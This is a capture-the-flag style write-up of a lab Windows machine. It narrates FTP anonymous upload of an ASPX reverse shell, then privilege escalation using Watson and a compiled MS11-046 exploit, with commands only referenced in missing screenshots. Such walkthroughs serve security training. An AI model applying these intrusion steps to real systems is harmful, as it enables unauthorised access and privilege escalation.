1. Enumeration
A standard nmap enumeration to check for open ports, let’s start with port 80 as the enumeration is less complicated!
Viewing 10.10.10.5 port 80 under the browser
The image is a link, when you click on it, you get directed to Microsoft’s IIS homepage!
Result from dirbuster using medium directories yielded no results other than the main page
Searchsploit does not yield anything useful as well!
Looks like we went into a rabbit hole. With that, we are left with port 21 to enumerate. And we will enumerate port 21 based on this website:
http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html
So from nmap results, it appears that FTP anonymous login is allowed, which we will do.
Oh and we are logged in!
And here we have are a list of commands we can use…
So we have a put command that allows us to perhaps write files, let’s test it.
So first we write “test” in test.txt and then login into ftp anonymously! After putting test.txt into the directory, we simply test it in our browser!
Alright, it works!
2. Exploitation
So now IIS runs code in ASP/ASPX, so we can try getting a reverse shell code in ASP/APSX
Here’s the command for an aspx shell file, of course, we simply change the options to asp if we need an asp file
After a while, the shell is created, and we repeat the steps earlier to put the file in! Note that you might need to login again into ftp due to time out!
And it’s in!
So over to my listener, we can see that we have received an incoming connection
However, it doesn’t end there as we are not administrators!
3. Privilege Escalation
First let’s take a look at systeminfo, to see if there are any significant things we need to look out for! Well there are no Hotfix(s), so we can be sure to find some notable vulnerabilities.
A similar linuxprivchecker exists for windows, and it is called Watson.
https://github.com/rasta-mouse/Watson
However, Watson is a C# script, which we open in Visual Studio, and our Kali machine does not have it. Secondly, Watson is not compatible with Windows 7 by default, so we’ll need to to find the original release of the application. (Watson version 1 as it supports Windows 7, same as the target machine -> See the README.md file!)
First we need to find out which version of .NET the machine runs on.
Then on our host machine, we open Watson.sln on Visual Studio (Make sure there is .NET development)
Under Watson Properties (Project > Watson Properties) we set the target framework to be the latest .NET framework of the targetted machine, which is .NET framework 3.5
Then, under Build > Configuration Manager… we configure the Watson project to x86 platform, as reflected in the systeminfo of the target machine from our enumeration earlier
Once that is done, we simply build Watson (Build > Build Watson)
Now we need to transfer files to the target machine. To do this, we require the services of Impacket’s smbserver python script
So i share my files through SMB server
To run Watson.exe, we simply use \\<IP>\share\<location of executable file> as shown in the screenshot above.
And there are a total of 5 vulnerabilities!
MS11-046 and MS13-005 allows us to escalate privileges, so let’s start with MS11-046
From searchsploit, we have 2 exploit scripts that are in C language, and we will use the one that is for x86 since the target machine is x86
Over here we have the usage, and look like we will have an executable file which upon execution should give us a privileged shell. Let’s compile the code in our host machine and then transfer with smb again
So we have the executable file ready
And we are root!
User.txt and root.txt!
The difficult part of this machine would be to escalate privileges, since there are quite a plenty to do, such as finding the first version, and also to modify the settings in order to allow Watson to run! Nonetheless, now that we have done it, we have another weapon in our hacking arsenal, so it’s a huge win!
Till next machine!
Matt and Gerald Computing 
1 Comment
Comments are closed.